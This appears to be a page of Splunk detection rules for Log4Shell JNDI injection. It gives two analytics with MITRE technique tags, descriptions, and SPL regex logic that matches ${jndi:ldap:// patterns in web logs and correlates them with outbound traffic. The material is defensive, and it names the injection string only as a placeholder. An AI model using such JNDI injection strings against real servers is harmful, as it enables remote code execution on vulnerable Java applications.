LoFP / if there is a vulnerablility scannner looking for log4shells this will trigger, otherwise likely to have low false positives.

Techniques

• T1133
• T1190

Sample rules

Log4Shell JNDI Payload Injection with Outbound Connection

• source: splunk
• technicques:
  • T1190
  • T1133

Description

The following analytic detects Log4Shell JNDI payload injections via outbound connections. It identifies suspicious LDAP lookup functions in web logs, such as ${jndi:ldap://PAYLOAD_INJECTED}, and correlates them with network traffic to known malicious IP addresses. This detection leverages the Web and Network_Traffic data models in Splunk. Monitoring this activity is crucial as it targets vulnerabilities in Java web applications using log4j, potentially leading to remote code execution. If confirmed malicious, attackers could gain unauthorized access, execute arbitrary code, and compromise sensitive data within the affected environment.

Detection logic

| from datamodel Web.Web 
| rex field=_raw max_match=0 "[jJnNdDiI]{4}(\:
|\%3A
|\/
|\%2F)(?<proto>\w+)(\:\/\/
|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?(?<affected_host>[a-zA-Z0-9\.\-\_\$]+)" 
| join affected_host type=inner [
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Traffic.All_Traffic by All_Traffic.dest 
| `drop_dm_object_name(All_Traffic)` 
| `security_content_ctime(firstTime)` 
| `security_content_ctime(lastTime)` 
| rename dest AS affected_host] 
| fillnull 
| stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user 
| `log4shell_jndi_payload_injection_with_outbound_connection_filter`

Log4Shell JNDI Payload Injection Attempt

• source: splunk
• technicques:
  • T1190
  • T1133

Description

The following analytic identifies attempts to inject Log4Shell JNDI payloads via web calls. It leverages the Web datamodel and uses regex to detect patterns like ${jndi:ldap:// in raw web event data, including HTTP headers. This activity is significant because it targets vulnerabilities in Java web applications using Log4j, such as Apache Struts and Solr. If confirmed malicious, this could allow attackers to execute arbitrary code, potentially leading to full system compromise. Immediate investigation is required to determine if the attempt was successful and to mitigate any potential exploitation.

Detection logic

| from datamodel Web.Web 
| regex _raw="[jJnNdDiI]{4}(\:
|\%3A
|\/
|\%2F)\w+(\:\/\/
|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?" 
| fillnull 
| stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user 
| `log4shell_jndi_payload_injection_attempt_filter`